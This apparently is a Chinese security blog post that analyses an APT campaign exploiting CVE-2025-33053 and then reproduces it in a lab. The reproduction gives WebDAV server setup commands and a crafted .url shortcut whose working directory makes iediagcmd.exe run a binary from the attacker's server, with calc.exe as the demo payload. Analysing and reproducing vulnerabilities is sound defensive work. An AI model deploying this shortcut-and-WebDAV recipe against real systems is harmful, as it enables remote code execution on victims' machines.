[已复现]中东政府遭袭实录：APT使用CVE-2025-33053攻击链还原

1 漏洞背景

CVE-2025-33053是Windows WebDAV中网络快捷方式文件远程代码执行漏洞。由Check Point捕获Stealth Falcon样本发现，6月被微软修复。

其原理为通过操纵工作目录，使合法系统程序调用攻击者WebDAV服务器上的恶意二进制文件。

2 攻击案例

土耳其国防公司收到的TLM.005_TELESKOPK_MAST_HASAR_HASAR_BILDIRIM_RAPORU.pdf.url文件，伪装成PDF快捷方式。该文件执行合法诊断工具iediagcmd.exe，但将工作目录重定向至WebDAV服务器，导致调用\summerartcamp[.]net@ssl@443路径下的恶意route.exe，而非系统32中的合法程序。

2.1 攻击链解析

攻击链启动于恶意.url 文件被打开，该文件会加载具备代码虚拟化混淆、防调试及手动 DLL 映射等反检测技术的 Horus Loader（C++ 恶意加载器）；

随后，Horus Loader一边解密显示合法PDF作为伪装，一边将伪装成IPv6字符串的有效载荷通过调用RtlIpv6StringToAddressA函数转换后，注入到悬浮状态的 msedge.exe 进程中实现隐蔽藏存；

载荷运行后，基于Mythic框架的C++植入物Horus Agent接管系统，它通过AES加密、HMAC校验与Base64编码组合方式和C2服务器通信，支持survey（主机指纹采集）、shinjectchunked（隐身注入）等命令，还借助字符串混淆、API 散列等技术规避静态分析；

后续更依靠系列工具包展开攻击，包括：

• 从虚拟磁盘读取NTDS.dit、SAM和SYSTEM文件以绕过系统锁的DC凭据提取工具；
• 伪装成“用户配置文件服务检查”的AES加密被动后门侦听器；
• 在C:\Windows\Temp生成RC4加密日志的定制键盘记录器。

3 漏洞复现细节

3.1 核心利用逻辑

攻击者通过配置.url文件的WorkingDirectory指向远程恶意服务器的WebDAV目录。

当受害者打开该文件时，系统会先调用合法程序iediagcmd.exe，随后自动加载同目录下的route.exe.

由于工作目录被恶意定向，最终执行的是攻击者预先放置在WebDAV服务器上的恶意route.exe。

具体复现步骤如3.2、3.3。

3.2 攻击者：创建WebDAV服务器

1. 安装组件：

sudo apt update && sudo apt upgrade -y
sudo apt install apache2 apache2-utils -y
sudo a2enmod dav
sudo a2enmod dav_fs
sudo systemctl restart apache2
sudo mkdir -p /var/www/webdav
sudo chown www-data:www-data /var/www/webdav
sudo chmod 755 /var/www/webdav
sudo vim /etc/apache2/sites-available/webdav.conf

1. 配置webdav.conf：

<VirtualHost *:80>
    ServerAdmin webmaster@localhost
    DocumentRoot /var/www/webdav

    <Directory /var/www/webdav>
        Options Indexes FollowSymLinks
        AllowOverride None

        DAV On
        Require all granted
    </Directory>

    ErrorLog ${APACHE_LOG_DIR}/webdav_error.log
    CustomLog ${APACHE_LOG_DIR}/webdav_access.log combined
</VirtualHost>

1. 重启服务：

sudo a2ensite webdav.conf
sudo a2dissite 000-default.conf
sudo systemctl reload apache2

复制本地计算机的iediagcmd.exe和calc.exe至/var/www/webdav目录

3.3 受害者：点击黑客制作好的URL文件

新建TXT文件写入以下内容，修改为.url格式：

[InternetShortcut]
URL=C:\Program Files\Internet Explorer\iediagcmd.exe
WorkingDirectory=\\192.168.146.138@80/DavWWWRoot\
ShowCommand=7
IconIndex=70
IconFile=C:\Windows\System32\SHELL32.dll

受害者打开该文件时，系统会调用WebDAV服务器上的恶意文件.